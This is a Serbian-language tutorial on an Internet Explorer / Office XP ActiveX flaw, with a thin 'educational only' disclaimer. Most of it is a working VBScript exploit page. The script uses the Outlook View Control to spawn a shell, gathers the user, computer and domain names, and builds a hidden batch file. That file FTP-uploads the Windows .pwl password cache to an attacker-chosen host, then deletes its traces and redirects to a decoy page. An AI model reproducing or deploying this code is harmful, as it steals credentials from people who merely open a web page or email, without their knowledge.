Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u
edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite
primenom ovih informacija.
[Kratak opis]
Kao i svaki bug, i ovaj ce pre ili kasnije biti uklonjen, ali evo o cemu se radi. Ako
korisnik poseti specijalno dizajniranu stranicu sa Internet Explorerom, ili otvori ili
pogleda poruku za programom OutLook XP, proizvoljne komande mogu biti izvrsene na
korisnickom kompu. Koristeci ovaj MSOFFICEXP bug omogucava vam se jos i citanje, menjanje
i brisanje poruka iz korisnikovih OutLook XP foldera. Ovaj problem je moguce izvrsiti na
svim sigurnosnim nivoima IEa, bez ikakvog upozorenja korisnika!
[Detaljnije]
Problem je u ActivX-u. Prilikom instalacije OfficeXP instalira malicioznu ActiveX kontrolu
- "Microsoft Outlook View Control". Ova kontrola izlaze svojsto
"selection" koje daje pristup korisnickim porukama. Takodje Vam izlaze Outlook
"Application" objekat koji moze dovesti do izvrsenja programa na korisnickom
kompu. U kombinaciji sa Windows Scripting Hostom, mogucnosti su beskrajne!
[Resenje problema]
Za sada je jedino resenje da uninstalirate Microsoft OfficeXP (a moze i Windows ;)
<p align="center"><blink><font size="6">Sacekajte
par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a
href="mailto:vladadj@ptt.yu">dql</a></p>
<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub f
On Error Resume Next
set sel=o1.object.selection
set obj1=sel.item(1)
set wshn =
obj1.Session.Application.createobject("wscript.network")
set wshs =
obj1.Session.Application.createobject("wscript.shell")
Set fso =
obj1.Session.Application.CreateObject("Scripting.FileSystemObject")
sIme=wshn.username
'uzimanje imena logovanog korisnika
'ciscenje imena od razmaka
for i=1 to len(sIme)
if mid(sIme,i,1)=" " then
tmp=""
else
tmp=mid(sIme,i,1)
end if
sTempIme = sTempIme + tmp
next
'skracenje na duzinu od 8 znakova
if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
sIme=sTempIme
Set file = fso.CreateTextFile ("c:\windows\temp\komande.txt",
TRUE)
file.write "user"+vbcrlf 'ime korisnickog
imena za logovanje na ftp sajt
file.write "pass"+vbcrlf 'sifra za
logovanje na ftp sajt
file.write "put
c:\windows\"+cstr(sIme)+".pwl"+vbcrlf
file.write "put
c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
file.write "quit"+vbcrlf
file.Close
Set file = fso.CreateTextFile
("c:\windows\temp\"+cstr(sIme)+".txt", TRUE)
file.write "ime kompa: "+cstr(wshn.computername)+vbcrlf
file.write "ime usera: "+cstr(wshn.username)+vbcrlf
file.write "domen: "+cstr(wshn.userdomain)+vbcrlf
file.close
Set file = fso.CreateTextFile ("c:\windows\temp\fajl.bat",
TRUE)
file.write "ftp -s:c:\windows\temp\komande.txt
127.0.0.1"+vbcrlf 'umesto 127.0.0.1 unesite IP hosta na koji treba
da se uploaduje PWL
file.write "del c:\windows\temp\komande.txt"+vbcrlf
file.write "del
c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
file.write "del c:\windows\temp\fajl.bat"+vbcrlf
file.close
wshs.run "c:\windows\temp\fajl.bat",vbhide
location = "pocetna.htm" 'preusmeravanje na
laznu stranicu
End Sub
